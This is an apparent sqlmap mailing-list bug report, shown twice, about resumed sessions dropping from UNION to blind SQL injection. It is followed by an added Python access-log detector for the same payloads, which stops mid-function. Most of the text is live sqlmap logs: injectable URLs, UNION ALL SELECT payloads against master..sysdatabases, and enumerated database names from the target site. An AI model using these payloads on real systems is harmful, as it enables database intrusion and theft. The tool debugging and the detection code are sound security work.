> [22:53:39] [DEBUG] got HTTP error code: 500
> [22:53:40] [DEBUG] got HTTP error code: 500
> [22:53:40] [DEBUG] got HTTP error code: 500
> [22:53:44] [DEBUG] got HTTP error code: 500
> [22:53:44] [DEBUG] got HTTP error code: 500
> [22:53:44] [INFO] confirming full inband sql injection on parameter 'art'
> [22:53:45] [DEBUG] got HTTP error code: 500
> [22:53:45] [DEBUG] got HTTP error code: 500
> [22:53:46] [DEBUG] got HTTP error code: 500
> [22:53:46] [DEBUG] got HTTP error code: 500
> [22:53:47] [DEBUG] got HTTP error code: 500
> [22:53:47] [DEBUG] got HTTP error code: 500
> [22:53:47] [WARNING] the target url is not affected by an exploitable
> full inband sql injection vulnerability
> [22:53:47] [INFO] confirming partial (single entry) inband sql
> injection on parameter 'art' by appending a false condition after the
> parameter value
> [22:53:48] [DEBUG] got HTTP error code: 500
> [22:53:49] [DEBUG] got HTTP error code: 500
> [22:53:49] [DEBUG] got HTTP error code: 500
> [22:53:49] [INFO] the target url is affected by an exploitable partial
> (single entry) inband sql injection vulnerability
> valid union:
> 'http://www.vulnsite.com:80/vulnasp.asp?prof=247&menu=vulnaspes&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%206410=6410'
>
> [22:53:49] [INFO] Fetched data logged to text files under
> '/pentest/database/sqlmap8/output/www.vulnsite.com'
>
> [*] shutting down at: 22:53:49
>
> It notes correctly the UNIONSQLi and ends OK. Soon after that, I try to
> recover the database by including only the argument "--dbs" and it cannot
> recover it with the UNIONSQLi, for the strange reason described
> below, and goes to the BLINDSQLi. It tries to find the right table name
> without first knowing how many there really are through the use of the
> UNIONSQLi, and directly tries to find out how many there are and their
> names using the BLINDSQLi.
>
> Example with resume:
>
> # ./sqlmap.py --threads 20 -v 2 --union-use -u
> "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021"
> -p art --string WRAPED --dbs
>
> sqlmap/0.9-dev - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 22:54:40
>
> [22:54:40] [DEBUG] initializing the configuration
> [22:54:40] [DEBUG] initializing the knowledge base
> [22:54:40] [DEBUG] cleaning up configuration parameters
> [22:54:40] [DEBUG] setting the HTTP timeout
> [22:54:40] [DEBUG] setting the HTTP method to GET
> [22:54:40] [DEBUG] creating HTTP requests opener object
> [22:54:40] [DEBUG] parsing XML queries file
> [22:54:40] [INFO] using
> '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session
> file
> [22:54:40] [INFO] resuming string match 'WRAPED' from session file
> [22:54:40] [INFO] resuming injection point 'GET' from session file
> [22:54:40] [INFO] resuming injection parameter 'art' from session file
> [22:54:40] [INFO] resuming injection type 'numeric' from session file
> [22:54:40] [INFO] resuming 0 number of parenthesis from session file
> [22:54:40] [INFO] resuming back-end DBMS 'microsoft sql server 2005'
> from session file
> [22:54:40] [INFO] resuming union comment '--' from session file
> [22:54:40] [INFO] resuming union count 6 from session file
> [22:54:40] [INFO] resuming union position 2 from session file
> [22:54:40] [INFO] testing connection to the target url
> [22:54:43] [WARNING] the testable parameter 'art' you provided is not
> into the Cookie
> [22:54:43] [INFO] testing for parenthesis on injectable parameter
> [22:54:43] [DEBUG] skipping test for MySQL
> [22:54:43] [DEBUG] skipping test for Oracle
> [22:54:43] [DEBUG] skipping test for PostgreSQL
> [22:54:43] [INFO] the back-end DBMS is Microsoft SQL Server
> web server operating system: Windows 2000
> web application technology: ASP.NET, Microsoft IIS 6.0, ASP
> back-end DBMS: Microsoft SQL Server 2005
>
[22:54:43] [INFO] fetching database names > [22:54:43] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(116)+CHAR(104)+CHAR(116)+CHAR(78)+CHAR(80)+CHAR(119)+ISNULL(CAST(name > AS VARCHAR(8000)), > CHAR(32))+CHAR(106)+CHAR(86)+CHAR(81)+CHAR(97)+CHAR(77)+CHAR(109), > NULL, NULL, NULL FROM master..sysdatabases-- AND 2796=2796 > [22:54:44] [DEBUG] got HTTP error code: 500 > [22:54:45] [WARNING] for some reasons it was not possible to retrieve > the query output through inband SQL injection technique, sqlmap is > going blind > [22:54:45] [INFO] fetching number of databases > [22:54:45] [DEBUG] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) > AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases > [22:54:45] [INFO] retrieved: [22:54:47] [DEBUG] got HTTP error code: 500 > [22:54:48] [DEBUG] got HTTP error code: 500 > . > . > . > [23:12:13] [DEBUG] performed 42 queries in 16 seconds > available databases [3]: > [*] mXX > [*] pXX > [*] tXX > > [23:12:13] [INFO] Fetched data logged to text files under > '/pentest/database/sqlmap8/output/www.vulnsite.com' > > [*] shutting down at: 23:12:13 > > > > > > > > > > > > But if I delete the session and send the sqlmap start over with the > "--dbs" activated, it correctly retrieves how many databases and their > names using the correct technique (UNIONSQLi). 
> > Example without resume (using --dbs first time): > # rm -rf output/* > # ./sqlmap.py --threads 20 -v 2 --union-use -u > "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021" > -p art --string WRAPED --dbs > > sqlmap/0.9-dev - automatic SQL injection and database takeover tool > http://sqlmap.sourceforge.net > > [*] starting at: 23:16:02 > > [23:16:02] [DEBUG] initializing the configuration > [23:16:02] [DEBUG] initializing the knowledge base > [23:16:02] [DEBUG] cleaning up configuration parameters > [23:16:02] [DEBUG] setting the HTTP timeout > [23:16:02] [DEBUG] setting the HTTP method to GET > [23:16:02] [DEBUG] creating HTTP requests opener object > [23:16:02] [DEBUG] parsing XML queries file > [23:16:02] [INFO] using > '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session > file > [23:16:02] [INFO] testing connection to the target url > [23:16:02] [INFO] testing if the provided string is within the target > URL page content > [23:16:03] [WARNING] the testable parameter 'art' you provided is not > into the Cookie > [23:16:03] [INFO] testing sql injection on GET parameter 'art' with 0 > parenthesis > [23:16:03] [INFO] testing unescaped numeric injection on GET parameter 'art' > [23:16:04] [DEBUG] got HTTP error code: 500 > [23:16:04] [DEBUG] got HTTP error code: 500 > [23:16:04] [INFO] confirming unescaped numeric injection on GET parameter 'art' > [23:16:05] [DEBUG] got HTTP error code: 500 > [23:16:05] [INFO] GET parameter 'art' is unescaped numeric injectable > with 0 parenthesis > [23:16:05] [INFO] testing for parenthesis on injectable parameter > [23:16:05] [DEBUG] got HTTP error code: 500 > [23:16:05] [DEBUG] got HTTP error code: 500 > [23:16:06] [DEBUG] got HTTP error code: 500 > [23:16:06] [INFO] the injectable parameter requires 0 parenthesis > [23:16:06] [INFO] testing MySQL > [23:16:06] [DEBUG] got HTTP error code: 500 > [23:16:06] [WARNING] the back-end DMBS is not MySQL > [23:16:06] [INFO] testing Oracle > 
[23:16:07] [DEBUG] got HTTP error code: 500 > [23:16:07] [WARNING] the back-end DMBS is not Oracle > [23:16:07] [INFO] testing PostgreSQL > [23:16:07] [DEBUG] got HTTP error code: 500 > [23:16:07] [WARNING] the back-end DMBS is not PostgreSQL > [23:16:07] [INFO] testing Microsoft SQL Server > [23:16:08] [DEBUG] got HTTP error code: 500 > [23:16:08] [INFO] confirming Microsoft SQL Server > [23:16:14] [DEBUG] got HTTP error code: 500 > [23:16:15] [DEBUG] got HTTP error code: 500 > [23:16:15] [INFO] the back-end DBMS is Microsoft SQL Server > web server operating system: Windows 2000 > web application technology: ASP.NET, Microsoft IIS 6.0, ASP > back-end DBMS: Microsoft SQL Server 2005 > > [23:16:15] [INFO] testing inband sql injection on parameter 'art' with > NULL bruteforcing technique > [23:16:15] [DEBUG] got HTTP error code: 500 > [23:16:15] [DEBUG] got HTTP error code: 500 > [23:16:16] [DEBUG] got HTTP error code: 500 > [23:16:16] [DEBUG] got HTTP error code: 500 > [23:16:16] [DEBUG] got HTTP error code: 500 > [23:16:17] [DEBUG] got HTTP error code: 500 > [23:16:17] [INFO] confirming full inband sql injection on parameter 'art' > [23:16:17] [DEBUG] got HTTP error code: 500 > [23:16:18] [DEBUG] got HTTP error code: 500 > [23:16:18] [DEBUG] got HTTP error code: 500 > [23:16:19] [DEBUG] got HTTP error code: 500 > [23:16:19] [DEBUG] got HTTP error code: 500 > [23:16:20] [DEBUG] got HTTP error code: 500 > [23:16:20] [WARNING] the target url is not affected by an exploitable > full inband sql injection vulnerability > [23:16:20] [INFO] confirming partial (single entry) inband sql > injection on parameter 'art' by appending a false condition after the > parameter value > [23:16:21] [DEBUG] got HTTP error code: 500 > [23:16:22] [DEBUG] got HTTP error code: 500 > [23:16:27] [DEBUG] got HTTP error code: 500 > [23:16:27] [INFO] the target url is affected by an exploitable partial > (single entry) inband sql injection vulnerability > valid union: > 
'http://www.vulnsite.com:80/professor.asp?prof=247&menu=professores&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20716=716' > > [23:16:27] [INFO] fetching database names > [23:16:27] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(COUNT(name) > AS VARCHAR(8000)), > CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), > NULL, NULL, NULL FROM master..sysdatabases-- AND 2578=2578 > [23:16:28] [DEBUG] got HTTP error code: 500 > [23:16:28] [DEBUG] performed 1 queries in 0 seconds > [23:16:28] [INFO] the SQL query provided returns 3 entries > [23:16:28] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name > AS VARCHAR(8000)), > CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), > NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT > TOP 0 name FROM master..sysdatabases)-- AND 7328=7328 > [23:16:31] [DEBUG] got HTTP error code: 500 > [23:16:31] [DEBUG] performed 2 queries in 3 seconds > [23:16:31] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name > AS VARCHAR(8000)), > CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), > NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT > TOP 1 name FROM master..sysdatabases)-- AND 1346=1346 > [23:16:32] [DEBUG] got HTTP error code: 500 > [23:16:32] [DEBUG] performed 3 queries in 0 seconds > [23:16:32] [DEBUG] query: UNION ALL SELECT NULL, NULL, > CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name > AS VARCHAR(8000)), > CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), > NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT > TOP 2 name FROM master..sysdatabases)-- AND 231=231 > [23:16:33] [DEBUG] got HTTP error code: 500 > [23:16:33] [DEBUG] performed 4 
queries in 1 seconds > available databases [3]: > [*] mXX > [*] pXX > [*] tXX > > [23:16:33] [INFO] Fetched data logged to text files under > '/pentest/database/sqlmap8/output/www.vulnsite.com' > > [*] shutting down at: 23:16:33 > > > > > > > > > > > > The same thing happens if I send sqlmap to dump the tables (--tables). > If I do not pass --tables the first time it runs and discovers the > vulnerability, when it runs again with the resumed file, it just go > right for BLINDSQLi, taking much longer to complete the task! > > > > -- > David Gomes Guimarães > -- David Gomes Guimarães |
From: David G. <sk...@gm...> - 2010-03-19 02:22:55
When I try to run sqlmap this way:

# ./sqlmap.py --threads 20 -v 2 --union-use -u "http://www.vulnsite.com/vulnasp.asp?prof=247&menu=vulnaspes&art=5021" -p art --string WRAPED

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 22:53:24

[22:53:24] [DEBUG] initializing the configuration
[22:53:24] [DEBUG] initializing the knowledge base
[22:53:24] [DEBUG] cleaning up configuration parameters
[22:53:24] [DEBUG] setting the HTTP timeout
[22:53:24] [DEBUG] setting the HTTP method to GET
[22:53:24] [DEBUG] creating HTTP requests opener object
[22:53:24] [DEBUG] parsing XML queries file
[22:53:24] [INFO] using '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session file
[22:53:24] [INFO] testing connection to the target url
[22:53:25] [INFO] testing if the provided string is within the target URL page content
[22:53:29] [WARNING] the testable parameter 'art' you provided is not into the Cookie
[22:53:29] [INFO] testing sql injection on GET parameter 'art' with 0 parenthesis
[22:53:29] [INFO] testing unescaped numeric injection on GET parameter 'art'
[22:53:29] [DEBUG] got HTTP error code: 500
[22:53:30] [DEBUG] got HTTP error code: 500
[22:53:30] [INFO] confirming unescaped numeric injection on GET parameter 'art'
[22:53:30] [DEBUG] got HTTP error code: 500
[22:53:30] [INFO] GET parameter 'art' is unescaped numeric injectable with 0 parenthesis
[22:53:30] [INFO] testing for parenthesis on injectable parameter
[22:53:31] [DEBUG] got HTTP error code: 500
[22:53:31] [DEBUG] got HTTP error code: 500
[22:53:32] [DEBUG] got HTTP error code: 500
[22:53:32] [INFO] the injectable parameter requires 0 parenthesis
[22:53:32] [INFO] testing MySQL
[22:53:32] [DEBUG] got HTTP error code: 500
[22:53:32] [WARNING] the back-end DMBS is not MySQL
[22:53:32] [INFO] testing Oracle
[22:53:33] [DEBUG] got HTTP error code: 500
[22:53:33] [WARNING] the back-end DMBS is not Oracle
[22:53:33] [INFO] testing PostgreSQL
[22:53:33] [DEBUG] got HTTP error code: 500
[22:53:33] [WARNING] the back-end DMBS is not PostgreSQL
[22:53:33] [INFO] testing Microsoft SQL Server
[22:53:34] [DEBUG] got HTTP error code: 500
[22:53:34] [INFO] confirming Microsoft SQL Server
[22:53:35] [DEBUG] got HTTP error code: 500
[22:53:35] [DEBUG] got HTTP error code: 500
[22:53:35] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005

[22:53:35] [INFO] testing inband sql injection on parameter 'art' with NULL bruteforcing technique
[22:53:39] [DEBUG] got HTTP error code: 500
[22:53:39] [DEBUG] got HTTP error code: 500
[22:53:40] [DEBUG] got HTTP error code: 500
[22:53:40] [DEBUG] got HTTP error code: 500
[22:53:44] [DEBUG] got HTTP error code: 500
[22:53:44] [DEBUG] got HTTP error code: 500
[22:53:44] [INFO] confirming full inband sql injection on parameter 'art'
[22:53:45] [DEBUG] got HTTP error code: 500
[22:53:45] [DEBUG] got HTTP error code: 500
[22:53:46] [DEBUG] got HTTP error code: 500
[22:53:46] [DEBUG] got HTTP error code: 500
[22:53:47] [DEBUG] got HTTP error code: 500
[22:53:47] [DEBUG] got HTTP error code: 500
[22:53:47] [WARNING] the target url is not affected by an exploitable full inband sql injection vulnerability
[22:53:47] [INFO] confirming partial (single entry) inband sql injection on parameter 'art' by appending a false condition after the parameter value
[22:53:48] [DEBUG] got HTTP error code: 500
[22:53:49] [DEBUG] got HTTP error code: 500
[22:53:49] [DEBUG] got HTTP error code: 500
[22:53:49] [INFO] the target url is affected by an exploitable partial (single entry) inband sql injection vulnerability
valid union: 'http://www.vulnsite.com:80/vulnasp.asp?prof=247&menu=vulnaspes&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%206410=6410'

[22:53:49] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap8/output/www.vulnsite.com'

[*] shutting down at: 22:53:49

It correctly detects the UNIONSQLi and ends OK. Soon after that, I try to recover the databases by including only the argument "--dbs", and it cannot recover them with the UNIONSQLi, for the strange reason described below, and goes to BLINDSQLi. It tries to find the right table name without first knowing how many there really are through the use of the UNIONSQLi, and directly tries to find out how many there are and their names using the BLINDSQLi.

Example with resume:

# ./sqlmap.py --threads 20 -v 2 --union-use -u "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021" -p art --string WRAPED --dbs

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 22:54:40

[22:54:40] [DEBUG] initializing the configuration
[22:54:40] [DEBUG] initializing the knowledge base
[22:54:40] [DEBUG] cleaning up configuration parameters
[22:54:40] [DEBUG] setting the HTTP timeout
[22:54:40] [DEBUG] setting the HTTP method to GET
[22:54:40] [DEBUG] creating HTTP requests opener object
[22:54:40] [DEBUG] parsing XML queries file
[22:54:40] [INFO] using '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session file
[22:54:40] [INFO] resuming string match 'WRAPED' from session file
[22:54:40] [INFO] resuming injection point 'GET' from session file
[22:54:40] [INFO] resuming injection parameter 'art' from session file
[22:54:40] [INFO] resuming injection type 'numeric' from session file
[22:54:40] [INFO] resuming 0 number of parenthesis from session file
[22:54:40] [INFO] resuming back-end DBMS 'microsoft sql server 2005' from session file
[22:54:40] [INFO] resuming union comment '--' from session file
[22:54:40] [INFO] resuming union count 6 from session file
[22:54:40] [INFO] resuming union position 2 from session file
[22:54:40] [INFO] testing connection to the target url
[22:54:43] [WARNING] the testable parameter 'art' you provided is not into the Cookie
[22:54:43] [INFO] testing for parenthesis on injectable parameter
[22:54:43] [DEBUG] skipping test for MySQL
[22:54:43] [DEBUG] skipping test for Oracle
[22:54:43] [DEBUG] skipping test for PostgreSQL
[22:54:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005

[22:54:43] [INFO] fetching database names
[22:54:43] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(116)+CHAR(104)+CHAR(116)+CHAR(78)+CHAR(80)+CHAR(119)+ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32))+CHAR(106)+CHAR(86)+CHAR(81)+CHAR(97)+CHAR(77)+CHAR(109), NULL, NULL, NULL FROM master..sysdatabases-- AND 2796=2796
[22:54:44] [DEBUG] got HTTP error code: 500
[22:54:45] [WARNING] for some reasons it was not possible to retrieve the query output through inband SQL injection technique, sqlmap is going blind
[22:54:45] [INFO] fetching number of databases
[22:54:45] [DEBUG] query: SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases
[22:54:45] [INFO] retrieved: [22:54:47] [DEBUG] got HTTP error code: 500
[22:54:48] [DEBUG] got HTTP error code: 500
.
.
.
[23:12:13] [DEBUG] performed 42 queries in 16 seconds
available databases [3]:
[*] mXX
[*] pXX
[*] tXX

[23:12:13] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap8/output/www.vulnsite.com'

[*] shutting down at: 23:12:13

But if I delete the session and start sqlmap over with "--dbs" activated, it correctly retrieves how many databases there are and their names using the correct technique (UNIONSQLi).

Example without resume (using --dbs the first time):

# rm -rf output/*
# ./sqlmap.py --threads 20 -v 2 --union-use -u "http://www.vulnsite.com/professor.asp?prof=247&menu=professores&art=5021" -p art --string WRAPED --dbs

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 23:16:02

[23:16:02] [DEBUG] initializing the configuration
[23:16:02] [DEBUG] initializing the knowledge base
[23:16:02] [DEBUG] cleaning up configuration parameters
[23:16:02] [DEBUG] setting the HTTP timeout
[23:16:02] [DEBUG] setting the HTTP method to GET
[23:16:02] [DEBUG] creating HTTP requests opener object
[23:16:02] [DEBUG] parsing XML queries file
[23:16:02] [INFO] using '/pentest/database/sqlmap8/output/www.vulnsite.com/session' as session file
[23:16:02] [INFO] testing connection to the target url
[23:16:02] [INFO] testing if the provided string is within the target URL page content
[23:16:03] [WARNING] the testable parameter 'art' you provided is not into the Cookie
[23:16:03] [INFO] testing sql injection on GET parameter 'art' with 0 parenthesis
[23:16:03] [INFO] testing unescaped numeric injection on GET parameter 'art'
[23:16:04] [DEBUG] got HTTP error code: 500
[23:16:04] [DEBUG] got HTTP error code: 500
[23:16:04] [INFO] confirming unescaped numeric injection on GET parameter 'art'
[23:16:05] [DEBUG] got HTTP error code: 500
[23:16:05] [INFO] GET parameter 'art' is unescaped numeric injectable with 0 parenthesis
[23:16:05] [INFO] testing for parenthesis on injectable parameter
[23:16:05] [DEBUG] got HTTP error code: 500
[23:16:05] [DEBUG] got HTTP error code: 500
[23:16:06] [DEBUG] got HTTP error code: 500
[23:16:06] [INFO] the injectable parameter requires 0 parenthesis
[23:16:06] [INFO] testing MySQL
[23:16:06] [DEBUG] got HTTP error code: 500
[23:16:06] [WARNING] the back-end DMBS is not MySQL
[23:16:06] [INFO] testing Oracle
[23:16:07] [DEBUG] got HTTP error code: 500
[23:16:07] [WARNING] the back-end DMBS is not Oracle
[23:16:07] [INFO] testing PostgreSQL
[23:16:07] [DEBUG] got HTTP error code: 500
[23:16:07] [WARNING] the back-end DMBS is not PostgreSQL
[23:16:07] [INFO] testing Microsoft SQL Server
[23:16:08] [DEBUG] got HTTP error code: 500
[23:16:08] [INFO] confirming Microsoft SQL Server
[23:16:14] [DEBUG] got HTTP error code: 500
[23:16:15] [DEBUG] got HTTP error code: 500
[23:16:15] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005

[23:16:15] [INFO] testing inband sql injection on parameter 'art' with NULL bruteforcing technique
[23:16:15] [DEBUG] got HTTP error code: 500
[23:16:15] [DEBUG] got HTTP error code: 500
[23:16:16] [DEBUG] got HTTP error code: 500
[23:16:16] [DEBUG] got HTTP error code: 500
[23:16:16] [DEBUG] got HTTP error code: 500
[23:16:17] [DEBUG] got HTTP error code: 500
[23:16:17] [INFO] confirming full inband sql injection on parameter 'art'
[23:16:17] [DEBUG] got HTTP error code: 500
[23:16:18] [DEBUG] got HTTP error code: 500
[23:16:18] [DEBUG] got HTTP error code: 500
[23:16:19] [DEBUG] got HTTP error code: 500
[23:16:19] [DEBUG] got HTTP error code: 500
[23:16:20] [DEBUG] got HTTP error code: 500
[23:16:20] [WARNING] the target url is not affected by an exploitable full inband sql injection vulnerability
[23:16:20] [INFO] confirming partial (single entry) inband sql injection on parameter 'art' by appending a false condition after the parameter value
[23:16:21] [DEBUG] got HTTP error code: 500
[23:16:22] [DEBUG] got HTTP error code: 500
[23:16:27] [DEBUG] got HTTP error code: 500
[23:16:27] [INFO] the target url is affected by an exploitable partial (single entry) inband sql injection vulnerability
valid union: 'http://www.vulnsite.com:80/professor.asp?prof=247&menu=professores&art=5021%20UNION%20ALL%20SELECT%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL%2C%20NULL--%20AND%20716=716'

[23:16:27] [INFO] fetching database names
[23:16:27] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(COUNT(name) AS VARCHAR(8000)), CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), NULL, NULL, NULL FROM master..sysdatabases-- AND 2578=2578
[23:16:28] [DEBUG] got HTTP error code: 500
[23:16:28] [DEBUG] performed 1 queries in 0 seconds
[23:16:28] [INFO] the SQL query provided returns 3 entries
[23:16:28] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 0 name FROM master..sysdatabases)-- AND 7328=7328
[23:16:31] [DEBUG] got HTTP error code: 500
[23:16:31] [DEBUG] performed 2 queries in 3 seconds
[23:16:31] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 1 name FROM master..sysdatabases)-- AND 1346=1346
[23:16:32] [DEBUG] got HTTP error code: 500
[23:16:32] [DEBUG] performed 3 queries in 0 seconds
[23:16:32] [DEBUG] query: UNION ALL SELECT NULL, NULL, CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)+ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32))+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), NULL, NULL, NULL FROM master..sysdatabases WHERE name NOT IN (SELECT TOP 2 name FROM master..sysdatabases)-- AND 231=231
[23:16:33] [DEBUG] got HTTP error code: 500
[23:16:33] [DEBUG] performed 4 queries in 1 seconds
available databases [3]:
[*] mXX
[*] pXX
[*] tXX

[23:16:33] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap8/output/www.vulnsite.com'

[*] shutting down at: 23:16:33

The same thing happens if I send sqlmap to dump the tables (--tables). If I do not pass --tables the first time it runs and discovers the vulnerability, when it runs again with the resumed file it just goes right for BLINDSQLi, taking much longer to complete the task!

--
David Gomes Guimarães
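From the detection side, an added example that is not sqlmap's code and not part of this thread: a small Python scanner that recognises, in web-server access-log request lines, the payload shape David's DEBUG lines show (the NULL-padded UNION ALL SELECT, the CHAR()-built delimiter strings around the fetched value, which differ between his two runs, the TOP N NOT IN single-row fetch and the trailing AND n=n), counts union columns and decodes the delimiters so requests from one run can be tied together. The log lines, paths and addresses are constructed, and an Apache/IIS-style "GET target HTTP/1.1" request line is assumed.

```python
# Added example, not code from sqlmap or from this thread: a log-side detector
# for the UNION payload shape that David's DEBUG lines show, decoding the CHAR()
# delimiter runs so requests from one sqlmap run can be tied together. Assumed:
# Apache/IIS-style request lines; all log lines, hosts and addresses are constructed.
import re
from urllib.parse import parse_qsl, quote, urlsplit

# Decoded 'art' values modelled on the thread: NULL-only confirmation union,
# delimiter-wrapped COUNT(name), a TOP N NOT IN single-row fetch, and a benign request.
_PAYLOADS = [
    ("/vulnasp.asp", 200,
     "5021 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL-- AND 6410=6410"),
    ("/professor.asp", 500,
     "5021 UNION ALL SELECT NULL, NULL, "
     "CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)"
     "+ISNULL(CAST(COUNT(name) AS VARCHAR(8000)), CHAR(32))"
     "+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), NULL, NULL, NULL"
     " FROM master..sysdatabases-- AND 2578=2578"),
    ("/professor.asp", 500,
     "5021 UNION ALL SELECT NULL, NULL, "
     "CHAR(84)+CHAR(116)+CHAR(77)+CHAR(114)+CHAR(107)+CHAR(90)"
     "+ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32))"
     "+CHAR(72)+CHAR(73)+CHAR(66)+CHAR(90)+CHAR(76)+CHAR(101), NULL, NULL, NULL"
     " FROM master..sysdatabases WHERE name NOT IN"
     " (SELECT TOP 1 name FROM master..sysdatabases)-- AND 1346=1346"),
    ("/professor.asp", 200, "5021"),
]

def _access_line(path, status, art):
    """One constructed log line; quote() encodes like a client (space -> %20, '+' -> %2B)."""
    target = f"{path}?prof=247&menu=professores&art={quote(art, safe='()=')}"
    return f'192.0.2.10 - - [18/Mar/2010:23:16:28 -0300] "GET {target} HTTP/1.1" {status} 1342'

SAMPLE_LOG = "\n".join(_access_line(*p) for p in _PAYLOADS)

REQ_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')
UNION_RE = re.compile(r"\bUNION\s+ALL\s+SELECT\b(?P<cols>.*?)(?:\bFROM\b|--|$)", re.I | re.S)
CHAR_RUN_RE = re.compile(r"(?:CHAR\(\d+\)\+)+CHAR\(\d+\)", re.I)
TAUTOLOGY_RE = re.compile(r"\bAND\s+(\d+)=\1\b", re.I)
TOP_N_RE = re.compile(r"NOT\s+IN\s*\(\s*SELECT\s+TOP\s+(\d+)\b", re.I)

def split_top_level(expr):
    """Split a SELECT list on commas outside parentheses, so that
    ISNULL(CAST(...), CHAR(32)) is counted as a single column."""
    parts, cur, depth = [], [], 0
    for ch in expr:
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
        if ch == "," and depth == 0:
            parts.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur).strip())
    return [p for p in parts if p]

def decode_char_run(run):
    """'CHAR(84)+CHAR(116)+...' -> 'Tt...': the delimiters sqlmap wraps around a fetched value."""
    return "".join(chr(int(n)) for n in re.findall(r"\d+", run))

def analyse_target(target):
    """Return a finding dict for one request target, or None if no UNION shape is present."""
    url = urlsplit(target)
    # parse_qsl percent-decodes and maps '+' to a space; the literal '+' between
    # CHAR() calls only survives because the client sent it as %2B.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        m = UNION_RE.search(value)
        if not m:
            continue
        cols = split_top_level(m.group("cols"))
        top = TOP_N_RE.search(value)
        return {
            "path": url.path,
            "param": name,
            "union_columns": len(cols),
            "null_columns": sum(1 for c in cols if c.upper() == "NULL"),
            "markers": [decode_char_run(r) for r in CHAR_RUN_RE.findall(value)],
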